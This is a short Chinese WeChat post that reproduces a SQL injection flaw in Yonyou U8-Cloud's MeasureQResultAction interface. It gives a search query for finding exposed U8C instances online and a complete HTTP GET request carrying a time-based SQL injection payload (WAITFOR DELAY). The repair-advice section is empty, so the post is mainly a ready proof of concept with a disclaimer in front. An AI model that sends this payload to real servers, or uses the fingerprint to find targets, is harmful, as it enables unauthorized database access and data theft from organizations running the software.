本文内容已进行多层信息处理以确保安全。请注意,使用本公众号提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。如需联系我们,请在公众号内点击“联系客服”按钮,感谢您的理解与合作。
0x01漏洞名称
用友U8-Cloud-MeasureQResultAction接口存在SQL注入漏洞,攻击者可以通过此接口执行sql命令。
0x03影响范围
用友U8-Cloud
0x04 网络空间测绘查询
title=="U8C"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQResultAction&method=execute&selectQueryCondition=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip, deflate
0x06nuclei批量验证(已上传纷传)
0x07修复建议
原文始发于微信公众号(网安探索队):用友U8-Cloud-MeasureQResultAction-SQL注入【漏洞复现】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论